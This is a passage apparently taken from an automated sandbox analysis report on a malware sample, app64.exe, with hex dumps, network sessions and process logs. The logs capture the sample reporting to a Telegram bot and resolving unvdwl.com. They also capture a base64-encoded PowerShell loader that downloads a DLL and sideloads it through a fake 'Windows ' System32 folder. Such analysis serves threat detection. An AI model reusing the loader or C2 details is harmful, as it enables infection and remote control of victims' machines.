                                                                                                                                                                              2024-10-30 10:28:58 UTC1378INData Raw: 40 60 48 8b 40 30 48 8b 95 80 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 48 8b 15 ca 23 df 00 48 8b 85 90 00 00 00 48 89 c1 ff d2 8b 85 9c 01 00 00 48 81 c4 28 02 00 00 5f 5d c3 55 48 89 e5 48 83 ec 30 48 89 4d 10 c7 45 fc 00 00 00 00 48 c7 45 f0 00 00 00 00 48 8b 05 94 23 df 00 48 8d 55 f0 48 8b 4d 10 49 89 d1 49 89 c8 ba 00 00 00 00 b9 00 00 00 00 ff d0 89 45 fc 83 7d fc 00 78 15 48 8b 15 72 23 df 00 48 8b 45 f0 48 89 c1 ff d2 8b 45 fc eb 03 8b 45 fc 48 83 c4 30 5d c3 55 48 81 ec 60 02 00 00 48 8d ac 24 80 00 00 00 48 89 8d f0 01 00 00 c7 85 bc 01 00 00 60 00 00 00 8b 85 bc 01 00 00 65 48 8b 00 48 89 85 b0 01 00 00 48 8b 85 b0 01 00 00 48 89 85 c8 01 00 00 48 8b 85 c8 01 00 00 48 8b 40 18 48 89 85 c0 01 00 00 48 8b 85 c0 01 00 00 48 8b 40 20 48
                                                                                                                                                                              Data Ascii: @`H@0HIHAH#HHH(_]UHH0HMEHEH#HUHMIIE}xHr#HEHEEH0]UH`H$H`eHHHHHH@HHH@ H
                                                                                                                                                                              2024-10-30 10:28:58 UTC1378INData Raw: 00 4c 8d 05 8a f0 de 00 ba 10 00 00 00 48 8d 05 1e 2f 00 00 48 89 c1 e8 36 1e 00 00 48 8d 85 90 02 00 00 48 89 c1 e8 14 fb ff ff 48 89 85 c8 02 00 00 48 83 bd c8 02 00 00 00 75 0a b8 ff ff ff ff e9 04 07 00 00 48 c7 85 60 02 00 00 00 00 00 00 48 c7 85 68 02 00 00 00 00 00 00 48 c7 85 70 02 00 00 00 00 00 00 48 c7 85 78 02 00 00 00 00 00 00 48 c7 85 80 02 00 00 00 00 00 00 48 c7 44 24 28 09 00 00 00 48 8d 85 60 02 00 00 48 89 44 24 20 4c 8d 0d 79 f0 de 00 4c 8d 05 52 f0 de 00 ba 10 00 00 00 48 8d 05 96 2e 00 00 48 89 c1 e8 9e 1d 00 00 48 8d 85 60 02 00 00 48 89 c1 e8 7c fa ff ff 48 89 85 c0 02 00 00 48 83 bd c0 02 00 00 00 75 0a b8 ff ff ff ff e9 6c 06 00 00 48 c7 85 53 02 00 00 00 00 00 00 48 c7 85 58 02 00 00 00 00 00 00 48 c7 85 47 02 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: LH/H6HHHHuH`HhHpHxHHD$(H`HD$ LyLRH.HH`H|HHulHSHXHG
                                                                                                                                                                              2024-10-30 10:28:58 UTC1378INData Raw: 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 30 02 00 00 48 89 50 08 48 8b 15 02 f5 de 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 10 02 00 00 48 89 50 08 48 8b 15 ba f4 de 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 08 02 00 00 48 89 50 08 48 8b 15 62 f4 de 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 f0 01 00 00 48 89 50 08 48 8b 15 5a f4 de 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 d0 01 00 00 48 89 50 08 48 8b 15 52 f4 de 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 00 00 00 00 48 8d 95 c0 01 00 00 48 89 50 08 48 c7 40 10 00 00 00 00 48 8d 15 22 18 df 00 48 89 50 18 48 83 c0 20 c7 00 00 00 00 00 48 8d 95
                                                                                                                                                                              Data Ascii: H H0HPHHPH@H HHPHHPH@H HHPHbHPH@H HHPHZHPH@H HHPHRHPH@H HHPH@H"HPH H
                                                                                                                                                                              2024-10-30 10:28:58 UTC1378INData Raw: 91 e6 ff ff 89 85 5c 06 00 00 83 bd 5c 06 00 00 00 78 26 48 8d 85 10 06 00 00 48 89 c1 e8 f6 ef ff ff ba b8 0b 00 00 b9 e8 03 00 00 e8 4d 14 00 00 48 89 c1 e8 a5 14 00 00 48 8d 85 10 06 00 00 48 89 c1 e8 ec e5 ff ff 48 8d 85 00 06 00 00 48 89 c1 e8 dd e5 ff ff eb 01 90 48 81 c4 e8 06 00 00 5f 5d c3 55 48 89 e5 48 89 4d 10 89 55 18 4c 89 45 20 b8 01 00 00 00 5d c3 90 90 90 90 49 89 ca 8b 05 87 d9 de 00 0f 05 c3 49 89 ca 8b 05 7f d9 de 00 0f 05 c3 49 89 ca 8b 05 77 d9 de 00 0f 05 c3 49 89 ca 8b 05 6f d9 de 00 0f 05 c3 49 89 ca 8b 05 6b d9 de 00 0f 05 c3 49 89 ca 8b 05 5b d9 de 00 0f 05 c3 49 89 ca 8b 05 57 d9 de 00 0f 05 c3 66 2e 0f 1f 84 00 00 00 00 00 66 90 48 83 ec 28 48 8b 05 45 d9 de 00 48 8b 00 48 85 c0 74 22 0f 1f 44 00 00 ff d0 48 8b 05 2f d9 de 00
                                                                                                                                                                              Data Ascii: \\x&HHMHHHHHH_]UHHMULE ]IIIwIoIkI[IWf.fH(HEHHt"DH/


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.549885149.154.167.2204435656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-30 10:29:48 UTC297OUTPOST /bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                              Expect: 100-continue
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-30 10:29:48 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                              2024-10-30 10:29:48 UTC94OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 68 61 74 5f 69 64 22 3a 20 20 22 31 35 33 36 31 33 31 34 35 39 22 2c 0d 0a 20 20 20 20 22 74 65 78 74 22 3a 20 20 22 5b 6c 6f 61 64 65 72 5d 20 61 6c 66 6f 6e 73 40 31 32 33 37 31 36 3a 20 49 6e 73 74 61 6c 6c 65 64 20 73 75 63 63 65 73 73 2e 22 0d 0a 7d
                                                                                                                                                                              Data Ascii: { "chat_id": "1536131459", "text": "[loader] user@123716: Installed success."}
                                                                                                                                                                              2024-10-30 10:29:48 UTC683INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                              Date: Wed, 30 Oct 2024 10:29:48 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 295
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                              {"ok":true,"result":{"message_id":2983,"from":{"id":7985593430,"is_bot":true,"first_name":"mybotunv","username":"mybotunvbot"},"chat":{"id":1536131459,"first_name":"Panchito","username":"panchitopistolesx","type":"private"},"date":1730284188,"text":"[loader] user@123716: Installed success."}}


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.54998534.117.59.814434672C:\Windows\System32\svchost.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-30 10:30:07 UTC52OUTGET /json HTTP/1.1
                                                                                                                                                                              Host: ipinfo.io
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              2024-10-30 10:30:07 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                              Content-Length: 314
                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                              date: Wed, 30 Oct 2024 10:30:07 GMT
                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                              via: 1.1 google
                                                                                                                                                                              strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-30 10:30:07 UTC314INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 54 65 78 61 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 33 32 2e 38 31 35 32 2c 2d 39 36 2e 38 37 30 33 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 37 35 32 34 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72
                                                                                                                                                                              Data Ascii: { "ip": "173.254.250.78", "hostname": "173.254.250.78.static.quadranet.com", "city": "Dallas", "region": "Texas", "country": "US", "loc": "32.8152,-96.8703", "org": "AS8100 QuadraNet Enterprises LLC", "postal": "75247", "timezone": "Amer


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.5499978.8.8.84434672C:\Windows\System32\svchost.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-30 10:30:26 UTC72OUTGET /resolve?name=unvdwl.com HTTP/1.1
                                                                                                                                                                              Host: dns.google
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              2024-10-30 10:30:26 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Date: Wed, 30 Oct 2024 10:30:26 GMT
                                                                                                                                                                              Expires: Wed, 30 Oct 2024 10:30:26 GMT
                                                                                                                                                                              Cache-Control: private, max-age=10800
                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                              Server: HTTP server (unknown)
                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              2024-10-30 10:30:26 UTC236INData Raw: 65 36 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 31 30 38 30 30 2c 22 64 61 74 61 22 3a 22 31 39 34 2e 32 36 2e 31 39 32 2e 35 32 22 7d 5d 2c 22 43 6f 6d 6d 65 6e 74 22 3a 22 52 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 31 38 35 2e 31 39 33 2e 31 32 34 2e 33 34 2e 22 7d 0d 0a
                                                                                                                                                                              Data Ascii: e6{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"unvdwl.com.","type":1}],"Answer":[{"name":"unvdwl.com.","type":1,"TTL":10800,"data":"194.26.192.52"}],"Comment":"Response from 185.193.124.34."}
                                                                                                                                                                              2024-10-30 10:30:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.5500088.8.8.84434672C:\Windows\System32\svchost.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-30 10:30:43 UTC76OUTGET /resolve?name=rootunvdwl.com HTTP/1.1
                                                                                                                                                                              Host: dns.google
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              2024-10-30 10:30:43 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Date: Wed, 30 Oct 2024 10:30:43 GMT
                                                                                                                                                                              Expires: Wed, 30 Oct 2024 10:30:43 GMT
                                                                                                                                                                              Cache-Control: private, max-age=1800
                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                              Server: HTTP server (unknown)
                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              2024-10-30 10:30:43 UTC305INData Raw: 31 32 61 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 72 6f 6f 74 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 75 74 68 6f 72 69 74 79 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 72 6f 6f 74 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 36 2c 22 54 54 4c 22 3a 31 38 30 30 2c 22 64 61 74 61 22 3a 22 31 2d 79 6f 75 2e 6e 6a 61 6c 6c 61 2e 6e 6f 2e 20 79 6f 75 2e 63 61 6e 2d 67 65 74 2d 6e 6f 2e 69 6e 66 6f 2e 20 32 30 32 34 30 39 32 37 30 38 20 32 31 36 30 30 20 37 32 30 30 20 31 38 31 34 34 30 30 20 33
                                                                                                                                                                              Data Ascii: 12a{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"rootunvdwl.com.","type":1}],"Authority":[{"name":"rootunvdwl.com.","type":6,"TTL":1800,"data":"1-you.njalla.no. you.can-get-no.info. 2024092708 21600 7200 1814400 3
                                                                                                                                                                              2024-10-30 10:30:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.550014140.82.121.44434672C:\Windows\System32\svchost.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-30 10:30:50 UTC89OUTHEAD /unvdwl/dwl/raw/main/ubotrestorehard.dat HTTP/1.1
                                                                                                                                                                              Host: github.com
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              2024-10-30 10:30:50 UTC442INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: GitHub.com
                                                                                                                                                                              Date: Wed, 30 Oct 2024 10:29:54 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                              2024-10-30 10:30:50 UTC3387INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.550020185.199.111.1334434672C:\Windows\System32\svchost.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-30 10:30:57 UTC118OUTHEAD /rootunvbot/mydata/refs/heads/main/ubotrestorehard.dat HTTP/1.1
                                                                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              2024-10-30 10:30:57 UTC805INHTTP/1.1 404 Not Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Length: 14
                                                                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                              X-GitHub-Request-Id: 96CF:2880F0:110F41E:128DF92:67220ADD
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Date: Wed, 30 Oct 2024 10:30:57 GMT
                                                                                                                                                                              Via: 1.1 varnish
                                                                                                                                                                              X-Served-By: cache-dfw-kdal2120109-DFW
                                                                                                                                                                              X-Cache: MISS
                                                                                                                                                                              X-Cache-Hits: 0
                                                                                                                                                                              X-Timer: S1730284257.426488,VS0,VE85
                                                                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                              X-Fastly-Request-ID: 5f8a816a393c558f9f4badd0a02981015de93158
                                                                                                                                                                              Expires: Wed, 30 Oct 2024 10:35:57 GMT
                                                                                                                                                                              Source-Age: 0


                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:06:28:51
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\app64.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\app64.exe"
                                                                                                                                                                              Imagebase:0x7ff7df110000
                                                                                                                                                                              File size:32'768 bytes
                                                                                                                                                                              MD5 hash:40B887735996FC88F47650C322273A25
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:1
                                                                                                                                                                              Start time:06:28:51
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:06:28:51
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:06:28:51
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:06:29:09
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:06:29:09
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
